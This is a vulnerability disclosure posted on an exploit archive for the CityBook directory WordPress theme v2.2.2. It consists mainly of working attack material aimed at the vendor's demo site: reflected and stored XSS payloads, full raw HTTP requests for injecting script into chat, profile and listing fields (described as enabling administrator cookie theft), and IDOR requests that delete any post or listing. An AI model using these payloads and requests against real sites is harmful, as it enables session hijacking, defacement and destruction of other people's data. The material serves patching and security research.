CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities

2019.12.27
ru m0ze (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: /wp-content/themes/citybook/

# Exploit Title: CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities # Google Dork: /wp-content/themes/citybook/ # Date: 27/12/2019 # Exploit Author: m0ze # Vendor Homepage: https://cththemes.com/ # Software Link: https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727 # Version: 2.2.2 # Tested on: Parrot OS # CWE: 79 ----[]- Info: -[]---- Demo website: https://citybook2.cththemes.com/ ----[]- Reflected XSS: -[]---- Input field with placeholder «What are you looking for?» on the homepage is vulnerable. Any payload will be triggered three times if you use "> in front of it. Same thing with a regular search (block near website logo). Payload Sample #0: "><img src=x onerror=alert(document.cookie)> Payload Sample #1: <img src=x onerror=alert(document.domain)> Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;> PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E#038;location_search&#038;nearby=off&#038;address_lat&#038;address_lng&#038;distance=10&#038;lcats%5B%5D= PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D= PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D= ----[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner). Payload Sample #0: <img src=x onerror=alert(`m0ze`)> Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 172 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats Cookie: _your_auth_cookies_here_ action=citybook_addons_chat_reply&_nonce=x75ac6299d&cid=1020&user_id=XXX&touid=1&reply_text=_payload_ Where: user_id=XXX (your unique WordPress ID); touid=1 (message receiver ID, in this example ID 1 == account «admin»); reply_text=_payload_ (your payload text). ----[]- Persistent Self-XSS -> Profile: -[]---- Vulnerable input fields: «Phone» and «Address» (will be triggered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile page for current user). Payload Sample #0: "><img src=x onerror=alert(document.cookie)> Payload Sample #1: "><h1>Greetings from m0ze</h1> Payload Sample #2: "><script>alert(`PoC`);</script> ----[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://citybook2.cththemes.com/submit/ (first time you need to order a «Free» plan and go to this URL again). Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description». «Trainers» section: «Add Member» option with «Name», «Job or Position» and «Description» vulnerable input fields. «Additional Services Fees» section: «Add Service» option with «Service Name» vulnerable input field. «Listing Address» payload also works on the admin dashboard, so it's possible to steal administrator cookies. Payload Sample #0: "><img src=x onerror=alert(document.cookie)> Payload Sample #1: "><h1>Greetings from m0ze</h1> Payload Sample #2: "><script>alert(`PoC`);</script> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------18467633426500 Content-Length: 5848 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=XXXX Cookie: _your_auth_cookies_here_ -----------------------------18467633426500 Content-Disposition: form-data; name="lid" XXXX -----------------------------18467633426500 Content-Disposition: form-data; name="listing_type_id" 4901 -----------------------------18467633426500 Content-Disposition: form-data; name="isSubmit" true -----------------------------18467633426500 Content-Disposition: form-data; name="hasError" false -----------------------------18467633426500 Content-Disposition: form-data; name="title" PoC -----------------------------18467633426500 Content-Disposition: form-data; name="content" <p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p> -----------------------------18467633426500 Content-Disposition: form-data; name="thumbnail[0]" -----------------------------18467633426500 Content-Disposition: form-data; name="cats[0]" 50 -----------------------------18467633426500 Content-Disposition: form-data; name="tags" -----------------------------18467633426500 Content-Disposition: form-data; name="locations" US| -----------------------------18467633426500 Content-Disposition: form-data; name="features[0]" 64 -----------------------------18467633426500 Content-Disposition: form-data; name="features[1]" 84 -----------------------------18467633426500 Content-Disposition: form-data; name="features[2]" 66 -----------------------------18467633426500 Content-Disposition: form-data; name="features[3]" 76 -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[timezone]" America/New_York -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[Monday][static]" enterHours -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[Tuesday][static]" enterHours -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[Wednesday][static]" enterHours -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[Thursday][static]" enterHours -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[Friday][static]" enterHours -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[Saturday][static]" enterHours -----------------------------18467633426500 Content-Disposition: form-data; name="working_hours[Sunday][static]" enterHours -----------------------------18467633426500 Content-Disposition: form-data; name="ltags_names" m0ze -----------------------------18467633426500 Content-Disposition: form-data; name="post_excerpt" "><h1>Greetings from m0ze</h1> -----------------------------18467633426500 Content-Disposition: form-data; name="contact_infos_address" <!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="contact_infos_latitude" <!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="contact_infos_longitude" <!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="gmap" -----------------------------18467633426500 Content-Disposition: form-data; name="contact_infos_email" <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="contact_infos_phone" -----------------------------18467633426500 Content-Disposition: form-data; name="contact_infos_website" -----------------------------18467633426500 Content-Disposition: form-data; name="price_range" moderate -----------------------------18467633426500 Content-Disposition: form-data; name="price_from" - -----------------------------18467633426500 Content-Disposition: form-data; name="price_to" - -----------------------------18467633426500 Content-Disposition: form-data; name="listing_dates" -----------------------------18467633426500 Content-Disposition: form-data; name="listing_dates_show_metas" -----------------------------18467633426500 Content-Disposition: form-data; name="lservices[0][service_id]" --imgsrc---imgsrcxonerroralertm0ze88- -----------------------------18467633426500 Content-Disposition: form-data; name="lservices[0][service_name]" <!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="lservices[0][service_desc]" -----------------------------18467633426500 Content-Disposition: form-data; name="lservices[0][service_price]" - -----------------------------18467633426500 Content-Disposition: form-data; name="lmember[0][name]" <!--<img src="--><img src=x onerror=(alert)(`Membername`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="lmember[0][job]" <!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="lmember[0][desc]" <!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//"> -----------------------------18467633426500 Content-Disposition: form-data; name="action" submit_listing -----------------------------18467633426500 Content-Disposition: form-data; name="_wpnonce" 02b218f88a -----------------------------18467633426500-- ----[]- IDOR #0: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings Cookie: _your_auth_cookies_here_ lid=XXXX&action=citybook_addons_delete_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag). ----[]- IDOR #1: -[]---- Remove the «Featured» option for any listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 101 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings Cookie: _your_auth_cookies_here_ lid=XXXX&lfeatured=true&action=citybook_addons_featured_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top